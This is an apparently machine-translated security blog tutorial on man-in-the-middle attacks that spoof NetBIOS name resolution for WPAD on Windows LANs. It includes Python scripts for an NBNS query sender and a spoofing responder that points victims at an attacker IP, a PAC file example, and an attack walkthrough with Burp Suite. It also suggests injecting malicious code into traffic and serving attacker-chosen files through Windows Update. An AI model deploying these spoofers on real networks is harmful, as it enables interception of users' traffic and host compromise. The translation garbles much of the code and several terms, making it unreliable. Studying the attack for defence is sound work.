Introduction to intranet penetration using NetBIOS protocol name resolution and WPAD

Introduction to intranet penetration using NetBIOS protocol name resolution and WPAD
0x00 Preface

The WPAD technology has been born for nearly ten years. Its biggest advantage lies in that in one or more LAN, when you need to set different proxy servers for users in the Intranet to connect to the Internet or enterprise intranet, WPAD can be used for flexible and convenient configuration. Because the method of configuring proxy servers is transparent to users without manual operations, attackers can use WPAD for Intranet penetration.

The technology of using WPAD for Intranet penetration has been around for many years and has not become as popular as ARP Spoof and other attacks. It may be due to the conventional Intranet penetration, for example, for Windows Domain penetration, attackers only need to obtain domain control permissions to control any machines in the domain. Therefore, attackers often only focus on how to capture the HASH of the domain administrator. However, even in the penetration of working groups, there are more effective attack methods than WPAD. However, when the attacker "No (qian) lv (ji) Shi (qiong);)", some "non-mainstream" methods will also be used for Intranet penetration.

This article will describe how WPAD works, how it is implemented, and how it is applied in the Intranet penetration. It only plays a role in throwing bricks, and we hope that many of you can "pull ".

PS: This article is written by the author in my spare time. It is inevitable that there will be some leaks. I hope you can check that (da) Officer (niu) will correct me in the comment area or PM me in time.

0x01 WPAD Overview

WPAD (Web Proxy Auto-Discovery Protocol) is short for the Web Proxy Automatic Discovery Protocol. This Protocol enables browsers of users in the LAN to automatically discover Proxy servers in the intranet, and use the discovered proxy server to connect to the Internet or enterprise intranet. WPAD supports all mainstream browsers and has supported the proxy server's automatic discovery/switching feature since IE 5.0. However, Apple considers the security risks of WPAD, safari in OS versions including OSX 10.10 and later will no longer support parsing of PAC files.

How WPAD works

When the system enables automatic proxy discovery, the browser automatically searches for the proxy server in the current lan when you use the browser to access the Internet. If the proxy server is found, A configuration file named Proxy Auto-Config is downloaded from the Proxy server. This file defines the proxy server that users should use when accessing a URL. The browser downloads and parses the file, and sets the corresponding proxy server to the user's browser.

PAC File

The PAC (Proxy Auto-Config) configuration file uses Javascript to describe the URL and Proxy server. Generally, proxy. pac is used as the file name, while WPAD. dat is used as the file name of the PAC file.

A pac file defines at least one JavaScript function named FindProxyForURL (url, host). The return value of this function is a string that specifies the URL access method, the two parameters represent the URL to be specified and the host name corresponding to the URL.

An example of the PAC file content is as follows:

1 2 3 4 5 6 7 function FindProxyForURL (url, host) {if (url = 'HTTP: // Her0in.org/') return 'direct'; if (shExpMatch (host, "* .wooyun.org") return "DIRECT"; if (host = 'wooyun. com ') return 'socks 127.1.1.1: 8080'; if (dnsResolve (host) = '10. 0.0.100 ') return 'proxy 127.2.2.2: 8080; Direct'; return 'direct ';}

This file defines that when a user accesses a http://Her0in.org/, there will be no DIRECT access URL using any proxy server. You can also use the shExpMatch function to configure the host or url match. SOCKS 127.1.1.1: 8080 specifies that the socks proxy of 127.1.1.1: 8080 is used to access the URL. PROXY 127.2.2.2: 8080; DIRECT specifies that the HTTP proxy of 127.2.2.2: 8080 is used for URL access. If the connection to the HTTP Proxy Server of 127.2.2.2: 8080 fails, the URL is directly accessed.

When you build an HTTP Proxy server that provides WPAD locally, you need to listen to port 80, because the client browser downloads the PAC file from port 80 by default, set the MIME type of the PAC file to application/x-ns-proxy-autoconfig or application/x-javascript-config, but this is not required.

Encoding of PAC files

FF and IE only support the system's default encoding type of PAC files, and does not support Unicode encoding, such as UTF-8. For more information about the PAC file, see here and here.

0x02 WPAD in Windows

In Windows, WPAD is supported since IE 5.0, and WPAD is enabled by default in Windows.

You can see in Internet option-connection tab-LAN Settings-Automatic Detection settings of IE browser that this function is selected by default.

As shown in:

Figure 1: WPAD settings of IE browser in Windows

In addition, Windows system supports the "Automatic proxy result cache" function from IE 5.5, and this function is enabled by default. This function is used to enable the HTTP Proxy Server whenever the client browser is connected successfully, the ARP cache is updated. Therefore, when the client browser connects to the proxy server again, that is, when the FindProxyForURL () function is called again, the ARP cache list is checked first, whether the HTTP Proxy server address to be connected exists. Therefore, the purpose of this function is to reduce the overhead of the system to obtain the allocated object.

 

You can disable this function using the following operations:

Method 1: Modify the Registry

You can use the following registry key to disable automatic proxy result Caching ":

HKEY_CURRENT_USER \ Software \ Policies \ Microsoft \ Windows \ CurrentVersion \ Internet Settings

Set EnableAutoproxyResultCache (manually created if it does not exist and its type is REG_DWORD) to 0 or 1.

0 = Disable cache; 1 = Enable Automatic proxy cache (this is the default setting)

Method 2: Modify group policy settings

In the Group Policy object Editor, choose "user configuration"> "management template"> "Windows Components"> "Internet Explorer", and enable "Disable cache automatic proxy script.

WPAD support for WinHTTP

In Windows, there is a Service named WinHTTP Web Proxy Auto-Discovery Service, the description is "WinHTTP implements the client HTTP stack and provides the Win32 API and COM automation components for developers to send HTTP requests and receive responses. In addition, WinHTTP also provides support for automatic discovery proxy server configuration by running the WPAD Protocol ."

PS: We recommend that you disable it for security reasons because it is not used in most cases.

0x03 WPAD implementation

There are two ways to implement WPAD: DHCP and DNS. The specific content is as follows.

Use the DHCP server to configure WPAD

DHCP is short for the Dynamic Host Configuration Protocol, that is, the Dynamic Host Configuration Protocol. It is a network Protocol used for LAN. It is at the OSI Application Layer and uses UDP as the transmission Protocol. The main function of DHCP is dynamic allocation, not only the IP address, but also some other information, such as the subnet mask, the additional information is set in the "DHCP options" Field of the DHCP protocol.

The DHCP workflow has four steps:

Figure 2 DHCP workflow

This is the process of interaction between the client and the DHCP server. The first two processes mainly send broadcast packets through the client, and then the DHCP server performs unicast communication with the client. The following two processes are the process in which the client obtains the IP address from the DHCP server. When the client has successfully obtained the IP address and the address is not occupied by other hosts before the client logs on to the network again, the first two processes will not be executed. The content of the DHCP protocol is not the focus of this article.

When the DHCP server is used to configure WPAD, the DHCP protocol will change. For specific changes, you can see in RFC 2131 that the DHCPINFORM message is added, which is used by the client to request local configuration parameters, therefore, the client sends a DHCPINFORM request message when requesting the WPAD host, and the DHCP server then responds to the DHCPACK confirmation message, the DHCP Options field in this message contains the DHCP 252 option, that is, the PAC file address of the WPAD proxy server.

The DHCP structure corresponding to the DHCPACK packet returned by the DHCP server:

Figure 3: DHCPACK message structure

For other definitions of DHCP Options, refer to the dhcp rfc 1531 document.

In most of the current intranets, DHCP servers are no longer used to configure the WPAD of the client. Instead, a simple method is adopted, such as the DNS server.

Configure WPAD with DNS

Using DNS to configure WPAD is essentially a Windows system name resolution mechanism.

The principle of using DNS to configure WPAD is as follows:

The client host initiates a WPAD + X query request to the DNS server. If the client host is in the domain environment, the WPAD + X query request is "WPAD. Domain Name of the current domain ". The DNS server resolves the WPAD host name and returns the IP address of the WPAD host. The client host downloads and parses the PAC file through port 80 of the IP address of the WPAD host.

Using DNS for WPAD configuration, the network administrator only needs to add the DNS record of the WPAD host to the DNS server.

PS: In the working group environment, when the client host executes the WPAD function, it will follow the name resolution sequence of the Windows system. The query name is "WPAD ", if the OS version is Vista (including Vista), the sequence is DNS => LLMNR => NBNS, and vice versa, DNS => NBNS.

0x04 use WPAD for Intranet penetration

The preceding content describes how WPAD works and how it is implemented in Windows. Next, we will focus on how to use WPAD for Intranet penetration.

As shown above, in most cases, DHCP is no longer used for WPAD configuration in the Intranet during actual penetration, however, when WPAD configuration is configured using DNS or is not configured on the Intranet, the name resolution sequence of the Windows system is followed by default. Therefore, you can use the name resolution sequence defect of the Windows system to perform "malicious" configuration of WPAD for Intranet penetration.

For more information about the sequence of Windows system name resolution and how to use Windows system name resolution to identify defects, see the following two articles.

Windows Name resolution mechanism and defect utilization (hereinafter referred to as article 1)

Use LLMNR name resolution defects to hijack the specified Intranet host session (hereinafter referred to as article 2)

WPAD-based man-in-the-middle attack using NetBIOS name resolution

In article 2, we have explained how to use LLMNR name resolution for Intranet penetration and provided the corresponding code. Therefore, this article will not describe "How to Use LLLMNR name parsing defects to conduct WPAD-based man-in-the-middle attacks ".

NetBIOS protocol name parsing process

A figure shows the NetBIOS name resolution process. Take the victim's access to the WEBSERVER in the LAN as an example (the victim's NetBIOS cache does not contain WEBSERVER ):

Figure 4: NetBIOS name resolution process

 

NetBIOS protocol analysis

Wireshark can be used to quickly capture data packets queried by the NetBIOS protocol name, for example:

Figure 5: NetBIOS name query data packet format

The protocol structure of NetBIOS is basically the same as that of LLMNR. However, it is different from LLMNR. The most obvious difference is that the host name in the NetBIOS protocol is encrypted. You can refer to relevant materials, such as dpkt and Wireshark, you can find the source code for encryption and decryption:

PS: the following code references the dpkt library.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 def encode_name (name): "" Return the NetBIOS first-level encoded name. "l = [] for c in struct. pack ('16s', name): c = ord (c) l. append (chr (c> 4) + 0x41) l. append (chr (c & 0xf) + 0x41) return ''. join (l) def decode_name (nbname): "" Return the NetBIOS first-level decoded nbname. "if len (nbname )! = 32: return nbname l = [] for I in range (0, 32, 2): l. append (chr (ord (nbname [I])-0x41) <4) | (ord (nbname [I + 1])-0x41) & 0xf) return ''. join (l ). split ('\ x00', 1) [0]

It is not difficult to analyze the encryption and decryption process from the Code. For how to use 16 in pack, see the description of NetBIOS name in article 1.

The NetBIOS protocol has many contents, many of which are directly related to some of the commands we use in Intranet penetration. For more information, refer to the RFC documentation of NetBIOS protocol.

Querying and responding to NetBIOS protocol in Python

Although there are already excellent open-source libraries for network protocols that support NetBIOS's query and response, we can build protocol packets by ourselves to better understand the NetBIOS protocol. Based on the data packets captured by Wireshark (figure 5), you can quickly construct and query data packets by NetBIOS protocol name. The Code is as follows:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 28 29 30 31 32 33 34 35 36 38 39 40 41 42 43 44 45 46 48 49 50 51 52 53 54 55 56 #/usr/bin/env python #-*-coding: UTF-8-*-_ doc _ = "NBNS Query, by Her0in" "import socket, struct class NBNS_Query: def _ init _ (self, name ): self. name = name self. populate () def populate (self): self. HOST = '2017. 168.16.255 'self. PORT = 137 self. nqs = socket. socket (socket. AF_INET, socket. SOCK_DGRAM) self. queryData = ("\ xa9 \ xfb" # Transaction ID "\ x01 \ x10" # Flags Query "\ x00 \ x01" # Question: 1 "\ x00 \ x00" # Answer RRS "\ x00 \ x00" # Authority RRS "\ x00 \ x00" # Additional RRS "\ x20" # length of Name: 32 "NAME" # Name "\ x00" # NameNull "\ x00 \ x20" # Query Type: NB "\ x00 \ x01") # Class self. data = self. queryData. replace ('name', struct. pack ("32 s", self. encode_name (self. name) # From http://code.google.com/p/dpkt/ Def encode_name (self, name): "" Return the NetBIOS first-level encoded name. "l = [] for c in struct. pack ('16s', name): c = ord (c) l. append (chr (c> 4) + 0x41) l. append (chr (c & 0xf) + 0x41) return ''. join (l) def Query (self): while 1: print "NBNS Querying... -> % s "% self. name self. nqs. sendto (self. data, (self. HOST, self. PORT) self. nqs. close () if _ name _ = "_ main _": nbns = NBNS_Query ("WPAD") nbns. query ()

 

You can use Wireshark to capture the response data packet for NetBIOS name query and quickly implement the name query response function. The Code is as follows:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 28 29 30 31 32 33 34 35 36 38 39 40 41 42 43 44 45 46 48 49 50 51 52 54 55 57 58 59 60 61 62 63 64 65 66 67 68 69 70 #/usr/bin/env python #- *-coding: UTF-8-*-_ doc _ = "NBNS Answer, by Her0in" import socket, struct, binascii class NBNS_Answer: def _ init _ (self, addr): self. IPADDR = addr self. nas = socket. s Ocket (socket. AF_INET, socket. SOCK_DGRAM) self. init_socket () self. populate () def populate (self): self. answerData = ("TID" # Transaction ID "\ x85 \ x00" # Flags Query "\ x00 \ x00" # Question "\ x00 \ x01" # Answer RRS "\ x00 \ x00 "# Authority RRS" \ x00 \ x00 "# Additional RRS" \ x20 "# length of Name: 32 "NAME" # Name "\ x00" # NameNull "\ x00 \ x20" # Query Type: NB "\ x00 \ x01" # Class "\ x00 \ x00 \ x00 \ xa5" # TTL "\ x00 \ X06 "#" \ x00 \ x00 "# Null" IPADDR ") # IP Address def init_socket (self): self. HOST = "0.0.0.0" self. PORT = 137 self. nas. setsockopt (socket. SOL_SOCKET, socket. SO_REUSEADDR, 1) self. nas. setsockopt (socket. IPPROTO_IP, socket. IP_MULTICAST_TTL, 255) def decode_name (self, nbname): "" Return the NetBIOS first-level decoded nbname. "if len (nbname )! = 32: return nbname l = [] for I in range (0, 32, 2): l. append (chr (ord (nbname [I])-0x41) <4) | (ord (nbname [I + 1])-0x41) & 0xf) return ''. join (l ). split ('\ x00', 1) [0] def Answser (self): self. nas. bind (self. HOST, self. PORT) print "Listening... "while 1: data, addr = self. nas. recvfrom (1024) tid = data [] name = data [] data = self. answerData. replace ('tid', TID) data = data. replace ('name', NAME) data = data. replace ('ipadd', socket. inet_aton (self. IPADDR) print "receivoned answer (% s) sent to % s for name % s" % (self. IPADDR, addr [0], self. decode_name (name) self. nas. sendto (data, addr) self. nas. close () if _ name _ = "_ main _": nbns = NBNS_Answer ("11.22.33.44") nbns. answser ()

 

Use NetBIOS name resolution to parse WPAD-based man-in-the-middle attack ideas

Through the above series of elaboration on the WPAD principle and the NetBIOS protocol, it is not difficult to understand the idea of using NetBIOS name resolution for WPAD-based man-in-the-middle attacks, however, the use of ideas will not be detailed as in article 2. I think that, as long as you understand the attack ideas, how to use them is a "methodology" problem. You can give full play to the specific situation.

WPAD-based man-in-the-middle attacks by using NetBIOS name resolution essentially take advantage of the name resolution sequence and NetBIOS protocol in Windows.

As mentioned in section 3 of the article, when the client host executes the WPAD function in the working group environment, it will follow the name resolution sequence of the Windows system and the query name is "WPAD ". In this case, register the "WPAD" Name and listen to port 137, wait for other hosts with WPAD enabled on the LAN to start the IE browser to connect to the network. Then, the browser proxy of the victim host can be set as the proxy server specified by the attacker. In this way, the victim's browser's Internet access record can be obtained.

You can quickly simulate a simple attack scenario by using the Demo program in the previous section and the SimpleHTTPServer function of Python and an HTTP or SOCKS proxy server. For example:

Figure 6: WPAD-based man-in-the-middle attack using NetBIOS name resolution

As shown in, attackers enable the NetBIOS malicious Response Program and listen to port 80 to provide the PAC configuration file (wpad. (HTTP Proxy Server => Burp Suite ).

The victim host (Windows XP) opens the IE browser (WPAD function enabled) and starts surfing the Internet. In this case, the browser will look for the proxy server in the current lan. In fact, the WPAD name is queried, it can be seen that the attacker's malicious Response Program has made a malicious response, and the HTTP server that provides the PAC Configuration File Download has printed the log information, at this time, the victim's browser has downloaded the PAC configuration file (the file content is the proxy server address information). Then, the victim's browser will use the proxy server specified by the attacker to access the Internet, this can be seen from the Burp Suite.

OK. The above content is the entire attack idea and process. In practice, the attack process can be programmed and automated.

0x05 Summary

There are still many ways to use the NetBIOS protocol to conduct man-in-the-middle attacks. The attack ideas can also be flexibly laid out based on actual needs. When WPAD is used for attacks, the actual effect may not be as good as imagined. However, once the attack works, the victim's host permissions can be obtained. It is worth a try, especially when there are no plans. In many intranets, administrators do not defend against these attacks. Apart from some desktop security products, for example, the firewall may implement strict filtering and interception. In most cases, this type of attack is very effective. In particular, you can filter victim hosts when performing name resolution, changes HTTP data packets and inserts malicious code for targeted attacks. In addition, the NetBIOS protocol has a better attack advantage than LLMNR. The name resolution of the NetBIOS protocol can respond to the domain name accessed by the victim. Of course, the NetBIOS protocol is used for query only when the DNS server does not respond successfully. This and WPAD can be combined with the updated domain name used by Windows Update to conduct man-in-the-middle attacks, download and execute the patch files specified by the attacker.

For details about the NetBIOS protocol, refer to the RFC documentation. There are many other things that can be used in Intranet penetration, such as the value of the OPCODE field and BROWSER protocol, more attack ideas are coming soon ".